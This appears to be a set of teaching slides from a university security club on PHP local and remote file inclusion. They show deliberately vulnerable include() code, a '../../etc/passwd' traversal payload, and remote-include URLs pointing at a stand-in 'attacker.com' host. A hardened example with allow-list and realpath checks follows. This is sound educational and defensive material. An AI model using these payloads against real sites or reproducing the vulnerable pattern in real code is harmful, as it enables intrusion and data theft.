1 of 5

2 of 5

File Inclusion

File inclusion is a class of vulnerability that occurs when user input that forms the path of an included file is not sanitized or handled correctly.

For example, this piece of code is vulnerable:

<?php
// Vulnerable: the raw query parameter is passed straight to include()
if ( isset( $_GET['file'] ) ) {
    include( $_GET['file'] );
}
?>

Since the user input from the GET request ($_GET['file']) is not sanitized before being passed to include, the user can include any other file from the file system or the network.

3 of 5

LFI/RFI

<?php
// Vulnerable: the raw query parameter is passed straight to include()
if ( isset( $_GET['file'] ) ) {
    include( $_GET['file'] );
}
?>

Normal usage:

http://example.com/?file=image.jpg

There are two classes of file inclusion attacks.

LFI (Local file inclusion):

When the attacker can leak information by including local files that already exist on the web server.

Example exploit:

http://example.com/?file=../../../../../../etc/passwd

RFI (Remote File Inclusion):

When the attacker can execute code remotely by including a file hosted on another server.

http://example.com/?file=http://attacker.com/evil.php

4 of 5

RFI special cases

<?php
// Vulnerable: the application appends the extension itself, but the raw input still reaches include()
if ( isset( $_GET['lang'] ) ) {
    include( $_GET['lang'] . '.php' );
}
?>

Example request:

http://example.com/?lang=en

Sometimes the application is written so that the extension is appended by the application rather than taken from the input. In that case we have to make some educated guesses about what the extension is and what else is appended after the input.

http://example.com/?lang=http://attacker.com/evil

The request to the attacker’s server would look like:

GET /evil.php HTTP/1.1

To exploit RFI effectively, you might need an internet-reachable web server under your control. (You can also exploit the previous levels to achieve a controlled web server... be creative!)
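For comparison, here is the include from these slides hardened against both the "?file=" traversal and the "?lang=" remote-include cases. This is an added example, not code from the original slides; the directory /var/www/app/lang and the two-letter language-code format are assumptions.

```php
<?php
// Added example (not from the original slides): the vulnerable include, hardened.
// Assumptions: language bundles live under /var/www/app/lang/ (hypothetical path)
// and are named <code>.php, e.g. en.php or pt-br.php.

declare(strict_types=1);

const LANG_DIR = '/var/www/app/lang'; // hypothetical base directory

/**
 * Return the absolute path of the bundle to include, or null to refuse the request.
 * Two independent checks:
 *  1. Allow-list the input shape: only short lowercase codes such as "en" or "pt-br",
 *     so "../", "http://" and null bytes never reach include() at all.
 *  2. Resolve the final path with realpath() and require it to stay under LANG_DIR,
 *     which also covers symlinks and anything the regex did not anticipate.
 */
function resolve_lang_file(string $lang): ?string
{
    if (!preg_match('/\A[a-z]{2}(?:-[a-z]{2})?\z/', $lang)) {
        return null;   // rejects ../../etc/passwd, http://attacker.com/evil, "en%00", ...
    }
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . $lang . '.php');
    if ($base === false || $path === false) {
        return null;   // base directory missing or bundle does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // resolved path escaped the allowed directory
    }
    return $path;
}

$lang = (isset($_GET['lang']) && is_string($_GET['lang'])) ? $_GET['lang'] : 'en';
$file = resolve_lang_file($lang);
if ($file === null) {
    http_response_code(400);
    exit('invalid language');
}
include $file;
```

As defence in depth against RFI specifically, keep allow_url_include=Off in php.ini (the default), so include() cannot fetch over HTTP even if a validation bug slips through.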

5 of 5

Shout out to UQ Cybersecurity group & ITIG!

Thanks to John Williams at Cyber group and dlg we will get a new (and bigger) cloud box for challenges soon :)